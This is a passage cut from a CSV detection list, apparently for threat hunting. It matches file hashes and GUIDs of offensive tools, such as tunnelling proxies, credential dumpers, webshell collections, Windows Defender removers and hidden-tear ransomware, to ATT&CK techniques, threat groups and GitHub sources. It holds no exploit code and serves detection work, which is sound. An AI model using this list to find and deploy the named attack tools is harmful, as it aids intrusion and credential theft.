TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30892" "*8e412bd460d0481671cf9dfe4ef2d5521f3a658e8c3ef1deefa7c445629ee667*",".{0,1000}8e412bd460d0481671cf9dfe4ef2d5521f3a658e8c3ef1deefa7c445629ee667.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30893" "*8e456a357b00fa82bc589a1a13f4dac4ace146083709d6e53106f86095df0f8d*",".{0,1000}8e456a357b00fa82bc589a1a13f4dac4ace146083709d6e53106f86095df0f8d.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30895" "*8e4732c33f20cfcb9d2b22ef388c1a22bbf1de084474de1cd1b88d3da275a938*",".{0,1000}8e4732c33f20cfcb9d2b22ef388c1a22bbf1de084474de1cd1b88d3da275a938.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30897" "*8e4b218bdbd8e098fff749fe5e5bbf00275d21f398b34216a573224e192094b8*",".{0,1000}8e4b218bdbd8e098fff749fe5e5bbf00275d21f398b34216a573224e192094b8.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the 
content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30899" "*8e4d5ff7eded1548f94e999720dc39564c2137a9d6a9439e085fb96591244417*",".{0,1000}8e4d5ff7eded1548f94e999720dc39564c2137a9d6a9439e085fb96591244417.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30900" "*8e56993ac94d62cedebac2d57693f96fe51b40b8b5ca8e9b6cf3e5845f6e9342*",".{0,1000}8e56993ac94d62cedebac2d57693f96fe51b40b8b5ca8e9b6cf3e5845f6e9342.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30903" "*8e57e88d9d21a9c125430aae2741afd816b870257d522637972de23efd922909*",".{0,1000}8e57e88d9d21a9c125430aae2741afd816b870257d522637972de23efd922909.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30904" 
"*8e657b59afa655e83a1794700bd13929e3fa6ebe84b415df51a6088e27aee2a5*",".{0,1000}8e657b59afa655e83a1794700bd13929e3fa6ebe84b415df51a6088e27aee2a5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30908" "*8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591*",".{0,1000}8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#filehash","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","30909" "*8e6eda0e8e14ac796434d506f11f68e1c25b44758c4a1eecc0b48a53c39cb7be*",".{0,1000}8e6eda0e8e14ac796434d506f11f68e1c25b44758c4a1eecc0b48a53c39cb7be.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30910" 
"*8e71740b1b1dd564dc2c05bb1e355baef9d0ab9bb14fafd91df60ba0998af866*",".{0,1000}8e71740b1b1dd564dc2c05bb1e355baef9d0ab9bb14fafd91df60ba0998af866.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30911" "*8e78f65f698f4adaa1ee3e14a5327a7ca7372140f82240d8cc40e753a172a9db*",".{0,1000}8e78f65f698f4adaa1ee3e14a5327a7ca7372140f82240d8cc40e753a172a9db.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30912" "*8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92*",".{0,1000}8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30914" "*8e8053c4ec1c1bebf984ba0e868361a87e5240993a6feec5ba3626a11f23cb87*",".{0,1000}8e8053c4ec1c1bebf984ba0e868361a87e5240993a6feec5ba3626a11f23cb87.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","30915" "*8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448*",".{0,1000}8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30916" "*8e8f868c283b165b0ccf0da8c85458d10d785bc872007be2ee33cb756a741ceb*",".{0,1000}8e8f868c283b165b0ccf0da8c85458d10d785bc872007be2ee33cb756a741ceb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - 
T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","30918" "*8e8fd5568a528f3b1148ba91ab2478082281896f72913d3a126ca66aa674d1da*",".{0,1000}8e8fd5568a528f3b1148ba91ab2478082281896f72913d3a126ca66aa674d1da.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30919" "*8e92ea80b86a38b2f0de7052da3a75175710f613dfb1195721a6c1b3eb53f8cc*",".{0,1000}8e92ea80b86a38b2f0de7052da3a75175710f613dfb1195721a6c1b3eb53f8cc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30920" "*8e954ebb0db4a599f3257b78ab4aec73f4e31e49fdf1e8da9b6705ce7cf84858*",".{0,1000}8e954ebb0db4a599f3257b78ab4aec73f4e31e49fdf1e8da9b6705ce7cf84858.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30921" "*8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd*",".{0,1000}8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd.{0,1000}","offensive_tool_keyword","defender-control","disable windows 
defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30922" "*8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd*",".{0,1000}8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30923" "*8eac62cb8511aa57cad56fa5b9a7205844ab2b46707e313bf754b520dec23a36*",".{0,1000}8eac62cb8511aa57cad56fa5b9a7205844ab2b46707e313bf754b520dec23a36.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30924" "*8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545*",".{0,1000}8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30925" "*8ebbf29735fb137a1de8df693e7762685ecf873e5b83fc927cd561e170c275bd*",".{0,1000}8ebbf29735fb137a1de8df693e7762685ecf873e5b83fc927cd561e170c275bd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30927" "*8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b*",".{0,1000}8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30928" 
"*8ec0be6f26497c4abef4cdb6e2eef4aec30f8cb2aacd65f200b7cc6daba26f0c*",".{0,1000}8ec0be6f26497c4abef4cdb6e2eef4aec30f8cb2aacd65f200b7cc6daba26f0c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30929" "*8ec72b1306f2b9c3b620926db69784d38e8169d3eb58d5db2d670d839e622765*",".{0,1000}8ec72b1306f2b9c3b620926db69784d38e8169d3eb58d5db2d670d839e622765.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30930" "*8ecf8d9dc253ab974d080663d0b238fb4e5c178b878fbc6850241bf72ea3dd8b*",".{0,1000}8ecf8d9dc253ab974d080663d0b238fb4e5c178b878fbc6850241bf72ea3dd8b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30932" "*8ed63d8ebff65f45e52363e48a49af26f04ef82e538aa92a589eb1525d1ff6cb*",".{0,1000}8ed63d8ebff65f45e52363e48a49af26f04ef82e538aa92a589eb1525d1ff6cb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30933" "*8ed72e4fc14d2a4bbb9d52d5521ebbe77d2ec46b5469d8e25c5965908686c7b7*",".{0,1000}8ed72e4fc14d2a4bbb9d52d5521ebbe77d2ec46b5469d8e25c5965908686c7b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30934" "*8EE4FF2A394B4683DA7E1BCB76010F184A587BFBF41E2853CE4E007ABDD9B75E*",".{0,1000}8EE4FF2A394B4683DA7E1BCB76010F184A587BFBF41E2853CE4E007ABDD9B75E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30935" "*8eedb89dca530ace7157ce9e1842cf3cfe4bc61830b4f23e03fb992663f8c05c*",".{0,1000}8eedb89dca530ace7157ce9e1842cf3cfe4bc61830b4f23e03fb992663f8c05c.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30937" "*8ef32f05998a4cc84237167458d42df34b3dc8534fb823ba909a8b2f76977eb7*",".{0,1000}8ef32f05998a4cc84237167458d42df34b3dc8534fb823ba909a8b2f76977eb7.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","30939" "*8ef62495d042ae030268ca52d01baece60c79f34d49a113ef5c2322e7041c053*",".{0,1000}8ef62495d042ae030268ca52d01baece60c79f34d49a113ef5c2322e7041c053.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump 
is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","30940" "*8ef6d74b5bea0620df5683dff79370b6308fe6bbfaa07cbffee08a26950cffbe*",".{0,1000}8ef6d74b5bea0620df5683dff79370b6308fe6bbfaa07cbffee08a26950cffbe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30941" "*8ef7679f55cb6735f37c83c4e5b0dd8d2143c2d279d481bfd4d47bd5be40fb98*",".{0,1000}8ef7679f55cb6735f37c83c4e5b0dd8d2143c2d279d481bfd4d47bd5be40fb98.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30942" "*8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c*",".{0,1000}8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30943" "*8efa930aaaf5c4db5ff39afaf5a1ef5a396a4257841ccdfcb66f3a2f1637db6d*",".{0,1000}8efa930aaaf5c4db5ff39afaf5a1ef5a396a4257841ccdfcb66f3a2f1637db6d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30944" "*8efacc6011b8491d8d6fbd8d3d1a3d9c7030f9a7a29000eaac922dfba7c5d72d*",".{0,1000}8efacc6011b8491d8d6fbd8d3d1a3d9c7030f9a7a29000eaac922dfba7c5d72d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30945" "*8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0*",".{0,1000}8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30946" "*8f0024607c41631601d00be5be8363412af06193353d0ae20b749f3843da41f0*",".{0,1000}8f0024607c41631601d00be5be8363412af06193353d0ae20b749f3843da41f0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30947" "*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#GUIDproject","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","30948" "*8f08c9ab02e3c180eef98a8e28c2f9be584d56dea5fa72dcdf739c5753841022*",".{0,1000}8f08c9ab02e3c180eef98a8e28c2f9be584d56dea5fa72dcdf739c5753841022.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30949" "*8f0c9eaabea10640a0e534b55d46c1d61aa92bb370d4696fb9e7b3c8bb965d8d*",".{0,1000}8f0c9eaabea10640a0e534b55d46c1d61aa92bb370d4696fb9e7b3c8bb965d8d.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30951" "*8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311*",".{0,1000}8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30954" "*8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132*",".{0,1000}8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 
